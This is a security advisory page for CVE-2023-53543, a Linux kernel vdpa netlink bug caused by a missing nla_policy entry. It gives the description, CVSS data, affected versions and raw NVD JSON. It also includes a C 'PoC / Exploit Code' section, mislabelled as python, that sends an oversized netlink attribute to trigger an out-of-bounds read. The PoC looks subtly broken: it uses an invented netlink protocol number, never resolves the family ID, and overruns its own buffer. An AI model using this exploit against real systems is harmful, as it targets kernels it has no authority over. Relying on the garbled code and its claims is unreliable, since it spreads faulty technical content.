Security Vulnerability Report
中文
CVE-2023-53543 CVSS 7.8 HIGH

CVE-2023-53543

Published: 2025-10-04 16:15:49
Last Modified: 2026-03-21 00:30:49
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: vdpa: Add max vqp attr to vdpa_nl_policy for nlattr length check The vdpa_nl_policy structure is used to validate the nlattr when parsing the incoming nlmsg. It will ensure the attribute being described produces a valid nlattr pointer in info->attrs before entering into each handler in vdpa_nl_ops. That is to say, the missing part in vdpa_nl_policy may lead to illegal nlattr after parsing, which could lead to OOB read just like CVE-2023-3773. This patch adds the missing nla_policy for vdpa max vqp attr to avoid such bugs.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5d6ba607d6cb5c58a4ddf33381e18c83dbb4098f(修复commit)
Linux Kernel < ea65e8b5e6b1a34deda7564f09c90e9e80db436a(修复commit)
Linux Kernel < ff71709445ac033e6e250d971683110e4781c068(修复commit)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2023-53543 PoC - vdpa netlink OOB read via missing nla_policy * This PoC demonstrates how to trigger the OOB read vulnerability * by sending a malicious netlink message with an oversized VDPA_ATTR_MAX_VQP attribute. * * Note: This requires local access and appropriate permissions (typically CAP_NET_ADMIN * or being in the netlink family's allowed group). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/genetlink.h> #define NETLINK_VDPA 21 #define VDPA_GENL_NAME "vdpa" #define VDPA_ATTR_MAX_VQP 5 /* Attribute type for max VQP */ struct nlmsghdr *build_netlink_message(int *msg_len) { /* Allocate buffer for netlink message */ int buf_size = 4096; char *buf = malloc(buf_size); if (!buf) return NULL; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; struct genlmsghdr *genlhdr = (struct genlmsghdr *)(buf + NLMSG_HDRLEN); /* Fill netlink header */ nlh->nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN); nlh->nlmsg_pid = getpid(); nlh->nlmsg_type = 0; /* Will be filled after getting family ID */ nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; /* Fill generic netlink header */ genlhdr->cmd = 1; /* VDPA_CMD_NEW_DEV or similar */ genlhdr->version = 1; genlhdr->reserved = 0; /* Add attribute with oversized payload to trigger OOB read */ struct nlattr *attr = (struct nlattr *)(buf + NLMSG_HDRLEN + GENL_HDRLEN); attr->nla_type = VDPA_ATTR_MAX_VQP; /* Intentionally set an oversized nla_len to bypass validation */ attr->nla_len = 4096; /* Much larger than expected */ /* Fill with payload data */ memset((char *)attr + NLA_HDRLEN, 'A', 4096 - NLA_HDRLEN); nlh->nlmsg_len += NLA_ALIGN(4096); *msg_len = nlh->nlmsg_len; return nlh; } int main(int argc, char *argv[]) { int sock_fd; struct sockaddr_nl src_addr, dest_addr; struct nlmsghdr *nlh; int msg_len; /* Create netlink socket */ sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_VDPA); if (sock_fd < 0) { perror("socket creation failed"); return -1; } /* Bind socket */ memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = getpid(); src_addr.nl_groups = 0; if (bind(sock_fd, (struct sockaddr *)&src_addr, sizeof(src_addr)) < 0) { perror("bind failed"); close(sock_fd); return -1; } /* Build malicious netlink message */ nlh = build_netlink_message(&msg_len); if (!nlh) { close(sock_fd); return -1; } /* Send the malicious message */ memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.nl_family = AF_NETLINK; dest_addr.nl_pid = 0; /* Destination is kernel */ dest_addr.nl_groups = 0; printf("Sending malicious vdpa netlink message...\n"); if (sendto(sock_fd, nlh, msg_len, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) < 0) { perror("sendto failed"); free(nlh); close(sock_fd); return -1; } printf("Message sent. Check kernel logs for OOB read or crash.\n"); free(nlh); close(sock_fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53543", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.413", "lastModified": "2026-03-21T00:30:49.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: Add max vqp attr to vdpa_nl_policy for nlattr length check\n\nThe vdpa_nl_policy structure is used to validate the nlattr when parsing\nthe incoming nlmsg. It will ensure the attribute being described produces\na valid nlattr pointer in info->attrs before entering into each handler\nin vdpa_nl_ops.\n\nThat is to say, the missing part in vdpa_nl_policy may lead to illegal\nnlattr after parsing, which could lead to OOB read just like CVE-2023-3773.\n\nThis patch adds the missing nla_policy for vdpa max vqp attr to avoid\nsuch bugs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.198", "versionEndExcluding": "6.1.47", "matchCriteriaId": "638778C1-5F03-4F56-AE33-745E57C94BA6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.12", "matchCriteriaId": "CF8ECF64-40AE-49AB-8315-4D83F9F56ECF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:*", "matchCriteriaId": "5B1C14ED-ABC4-41D3-8D9C-D38C6A65B4DE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5d6ba607d6cb5c58a4ddf33381e18c83dbb4098f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea65e8b5e6b1a34deda7564f09c90e9e80db436a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ff71709445ac033e6e250d971683110e4781c068", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.